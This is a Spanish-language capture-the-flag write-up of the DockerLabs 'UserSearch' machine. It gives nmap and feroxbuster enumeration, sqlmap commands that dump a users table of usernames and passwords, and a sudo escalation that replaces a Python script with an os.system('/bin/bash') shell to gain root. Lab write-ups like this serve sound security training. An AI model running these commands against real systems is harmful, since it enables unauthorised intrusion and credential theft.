Post

UserSearch , DockerLabs

portada

En este reto de DockerLabs aprendemos.

  • Scan de puertos
  • sqli

Herramientas y recursos

  • nmap
  • feroxbuster
  • sqlmap

Enumeracion

Lanzamos nmap con los parametros de costumbre en un ctf.

1
sudo nmap -p- -sS -sC -sV --min-rate=5000 -n -Pn -oX usersearch 172.18.0.2

reporte

Como vemos en el reporte nos encontramos con ssh y el apache accesible. Mientras reviso la web nos lanzamos feroxbuster en busca de mas pistas.

Despues de estar pronbando manualmente distintos tipos de inyeccion xss, ssti, sql, no consiguo nada hasta que me da por poner admin.

admin

Como vemos en la imagem nos devuelve un password el cual pruebo con ssh sin exito. Me lleva a pensar que hay una bbdd y que solo devuelve el contenido cuando acertamos con el usuario. La respuesta de ferox nos encuentra un directorio javascript y un fichero db.php el cual debe de ser el encargado de realizar las peticione , como manualmente no puede me lanzo sqlmap.

ferox

SQLI

Este primer comando nos va a buscar todas la bbdd que encuentre.

1
sqlmap -u http://172.18.0.2 --forms --dbs --batch

Revisando la salida del sqlmap leo que la inyeccion se provoca a traves del parametro user.

bbdd

Una vez sabemos los nombres de las bbdd nos seguimos metiendo mas a fondo en esta ocasion debemos indicar que queremos ver las tablas de la base de datos que nosotros queramos.

1
sqlmap -u http://172.18.0.2 --forms -D testdb --tables --batch

tablas

Como vemos nos encuentra la tabla de users , ahora le hemos de indicar que nos muestre el contenido de dicha tabla que ya esta en columnas.

1
sqlmap -u http://172.18.0.2 --forms -D testdb -T users --columns --batch 

columns

Y por ultimo nos a de mostrar el contenido de las columnas.

1
sqlmap -u http://172.18.0.2 --forms -D testdb -T users -C password,username --dump --batch

contenido

Ya conseguimos leer leer los posibles usuarios y contraseñas.

Infiltracion

YA habiamos probrado el user admin y no era asi que vamos a probar otro.

Entro con el user kvzlx

sudol

Como vemos nos deja realizar la escalada con python3.

searchbins

Escalada final

Para convertirnos en root realizo los siguientes pasos.

  1. Elimino el script que indica sudo
  2. Creo uno nuevo con el siguiente contenido.
       import os;os.system('/bin/bash')
    
  3. Por ultimo ejecuto
1
sudo /usr/bin/python3 /home/kvzlx/system_info.py 

root

Muchas gracia por leer e interesarte en esto temas. Comparte conocimiento.

This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.